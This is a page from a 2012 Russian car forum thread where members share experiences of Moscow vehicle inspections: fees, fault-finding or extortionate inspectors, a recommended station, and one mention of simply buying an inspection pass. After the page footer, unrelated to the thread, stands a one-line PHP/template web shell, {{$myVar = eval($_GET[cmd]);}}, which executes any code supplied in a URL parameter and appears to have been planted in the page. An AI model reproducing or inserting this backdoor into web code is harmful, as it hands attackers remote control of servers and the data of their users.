+ Ответить в теме
Страница 3 из 4 ПерваяПервая 1 2 3 4 ПоследняяПоследняя
Показано с 21 по 30 из 40

Тема: Мой опыт прохождения ТО


  1. #21
    I место Самые Интересные Диски 2011 White pony is just really nice White pony is just really nice White pony is just really nice White pony is just really nice White pony is just really nice Аватар для White pony
    Регистрация
    18.05.2010
    Откуда
    Москва
    Машина
    Audi TT RS
    Сообщений
    1,900
    Цитата Сообщение от dimitryst Посмотреть сообщение
    Я только не понял, почему 780, вроде же легковушки были по 720?
    Как я поняла, цена формируется из гос пошлины и комиссии СТО. Комиссия может варьироваться в амплитуде, установленной законом. Поэтому у кого-то может быть и 720, а у кого-то 780.

    Добавлено через 52 секунды
    Цитата Сообщение от Alexandr 922 Посмотреть сообщение
    -------- Катюх , мне проще с людьми забиться на конкретное время приехать , не ждать пройти за определенную сумму и уехать . У тебя машина явно не начала 2000 года , тебе проще . Раньше всегда сам проходил
    ну да, ты прав. у моего коллеги МК4, его 3 раза разворачивали из-за дурацких мелочей.
    Последний раз редактировалось White pony; 14.05.2012 в 14:35. Причина: Добавлено сообщение
    If you wanna be rich
    You've got to be a bitch
    If you wanna ride
    Ride the White pony

    Enjoy yourself and fuck them all 0:-)

  2. #22
    Цитата Сообщение от White pony Посмотреть сообщение
    Как я поняла, цена формируется из гос пошлины и комиссии СТО. Комиссия может варьироваться в амплитуде, установленной законом. Поэтому у кого-то может быть и 720, а у кого-то 780.

    Добавлено через 52 секунды


    ну да, ты прав. у моего коллеги МК4, его 3 раза разворачивали из-за дурацких мелочей.
    ---- Катюх , к тебе не прикалупаться !!! Да еще на белом гольфе . Они и так знают с кого можно рвануть денег . Катюх , в этот день звезды , и все остальные - были на твоей стороне
    Последний раз редактировалось Alexandr 922; 14.05.2012 в 15:05.

  3. #23
    Супер Модератор BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of Аватар для BON
    Регистрация
    08.11.2006
    Откуда
    Москва
    Машина
    Skoda
    Сообщений
    15,564
    Цитата Сообщение от White pony Посмотреть сообщение
    Как я поняла, цена формируется из гос пошлины и комиссии СТО. Комиссия может варьироваться в амплитуде, установленной законом. Поэтому у кого-то может быть и 720, а у кого-то 780.

    Добавлено через 52 секунды


    ну да, ты прав. у моего коллеги МК4, его 3 раза разворачивали из-за дурацких мелочей.
    по новому закону будет каждые 3 раза по 780 руб...... времени потрачено жесть, нервов жесть, денег жесть как если вообще никуда не ехать, бензолина жесть )))))

    У друга на работе, коллега на Финике ФХ35 свеженьком, не прошел ТО ))) доколупались
    песок сыпется....не останавливайтесь на достигнутом !

  4. #24
    GTI-Racing S@TURN will become famous soon enough Аватар для S@TURN
    Регистрация
    09.07.2006
    Откуда
    мск
    Машина
    vr6 color concept - sold, а4 2.5tdi куатро!-sold, EOS - недопережитиай.
    Сообщений
    3,787
    Цитата Сообщение от BON Посмотреть сообщение
    по новому закону будет каждые 3 раза по 780 руб...... времени потрачено жесть, нервов жесть, денег жесть как если вообще никуда не ехать, бензолина жесть )))))

    У друга на работе, коллега на Финике ФХ35 свеженьком, не прошел ТО ))) доколупались
    до какого места доколупались интересно? к чему реально кроме как к тонировке можно доколупаться?)
    NON LIMITUS HOMICUS DOLBOEBICUS
    (нет предела человеческой глупости)

  5. #25
    Супер Модератор BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of Аватар для BON
    Регистрация
    08.11.2006
    Откуда
    Москва
    Машина
    Skoda
    Сообщений
    15,564
    Цитата Сообщение от S@TURN Посмотреть сообщение
    до какого места доколупались интересно? к чему реально кроме как к тонировке можно доколупаться?)

    специально узнал, к фарам. Чел в шоке, машина обслуживается у дилера, жалоб от встречных нет, вроде все исправно, да там все корректор и автоматика. Все может быть, конечно, но реально просто пошел от них и купил талон.
    песок сыпется....не останавливайтесь на достигнутом !

  6. #26
    GTI-Racing S@TURN will become famous soon enough Аватар для S@TURN
    Регистрация
    09.07.2006
    Откуда
    мск
    Машина
    vr6 color concept - sold, а4 2.5tdi куатро!-sold, EOS - недопережитиай.
    Сообщений
    3,787
    Цитата Сообщение от BON Посмотреть сообщение
    специально узнал, к фарам. Чел в шоке, машина обслуживается у дилера, жалоб от встречных нет, вроде все исправно, да там все корректор и автоматика. Все может быть, конечно, но реально просто пошел от них и купил талон.
    ну там ж хрень такую к фарам подкатывают и по ней четко видно правильно ли работает свет, совпадает ли пятно, я прям на месте как-то регулировал. Так что видимо вымогали бабло, а человек прогнулся. Я бы бучу поднял и все бы ректально покарал там. :prayer: но пока не сталкивался с такими.
    Даже проходили ТО на тачке с битой лобовухой, под честное слово, что через месяц поменяем получили талон.
    NON LIMITUS HOMICUS DOLBOEBICUS
    (нет предела человеческой глупости)

  7. #27
    Супер Модератор BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of Аватар для BON
    Регистрация
    08.11.2006
    Откуда
    Москва
    Машина
    Skoda
    Сообщений
    15,564
    Цитата Сообщение от S@TURN Посмотреть сообщение
    ну там ж хрень такую к фарам подкатывают и по ней четко видно правильно ли работает свет, совпадает ли пятно, я прям на месте как-то регулировал. Так что видимо вымогали бабло, а человек прогнулся. Я бы бучу поднял и все бы ректально покарал там. :prayer: но пока не сталкивался с такими.
    Даже проходили ТО на тачке с битой лобовухой, под честное слово, что через месяц поменяем получили талон.

    ну вот не повезло ему это точно, он как я понял не из тех кто будет там наезжать, простой, обычный человек. Это как пример, когда не обязательно приехать в уверенности на современной тачке. Может быть в другом месте все было бы по другому, но тратить время на поиск лояльных пунктов я бы и сам не стал...... я конечно не знаю все подробности как оно там регулируют или нет, но что там ему нарегулируют в линзах биксенона в пункте ТО где еще полицейские ))))
    песок сыпется....не останавливайтесь на достигнутом !

  8. #28
    Цитата Сообщение от BON Посмотреть сообщение
    ну вот не повезло ему это точно, он как я понял не из тех кто будет там наезжать, простой, обычный человек. Это как пример, когда не обязательно приехать в уверенности на современной тачке. Может быть в другом месте все было бы по другому, но тратить время на поиск лояльных пунктов я бы и сам не стал...... я конечно не знаю все подробности как оно там регулируют или нет, но что там ему нарегулируют в линзах биксенона в пункте ТО где еще полицейские ))))
    ---- обычно они к своей технике никого не подпускают . Сразу отказ - и повторное прохождение

  9. #29
    I место Самые Интересные Диски 2011 White pony is just really nice White pony is just really nice White pony is just really nice White pony is just really nice White pony is just really nice Аватар для White pony
    Регистрация
    18.05.2010
    Откуда
    Москва
    Машина
    Audi TT RS
    Сообщений
    1,900
    Поэтому я создала эту тему и жирным выделила адрес лояльного и адекватного СТО.
    If you wanna be rich
    You've got to be a bitch
    If you wanna ride
    Ride the White pony

    Enjoy yourself and fuck them all 0:-)

  10. #30
    GTI-Racing dimitryst will become famous soon enough Аватар для dimitryst
    Регистрация
    13.09.2011
    Откуда
    МСК
    Машина
    Разноцветное такси
    Сообщений
    1,052
    Только что прошел ТО на старой папиной митцу, вот здесь: http://mgstk.ru/auto/pto?okrugid=5, ПТО на Остаповском проезде (это возле пересечения ТТК и Волгоградке.
    На все потратил часа два (от отъезда от дома до приезда обратно, живу в 10 минутах).
    Проверили тормоза, свет, выхлоп и лампочки, причем из 40 минут у них, наверное 10 ушло на собственно проверки, остальное - бумаги.
    Не стали придираться к трещине на лобовом, на 1см заходящей в зону вод.дворника, и к светящей чуть-чутьниже правой фаре.
    Денег отдал 800р, из них 50 - комиссия терминала.

+ Ответить в теме
Страница 3 из 4 ПерваяПервая 1 2 3 4 ПоследняяПоследняя

Похожие темы

  1. 18'' на 4-й гольф - у кого есть опыт?
    от V.e.R в разделе Шины, диски
    Ответов: 23
    Последнее сообщение: 01.04.2024, 12:10
  2. Страхование: какой у кого опыт?
    от PhotoN в разделе Законодательство и страхование
    Ответов: 17
    Последнее сообщение: 08.05.2020, 03:27
  3. Времена прохождения различных треков
    от VVZ в разделе Авто спорт
    Ответов: 4
    Последнее сообщение: 09.06.2010, 21:59
  4. Нужна Помощь Для Прохождения То ?
    от crazy_engineer в разделе Курилка
    Ответов: 5
    Последнее сообщение: 22.08.2008, 21:08
  5. Горький Опыт.......
    от Golfan в разделе Двигатель
    Ответов: 7
    Последнее сообщение: 03.06.2008, 15:09

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}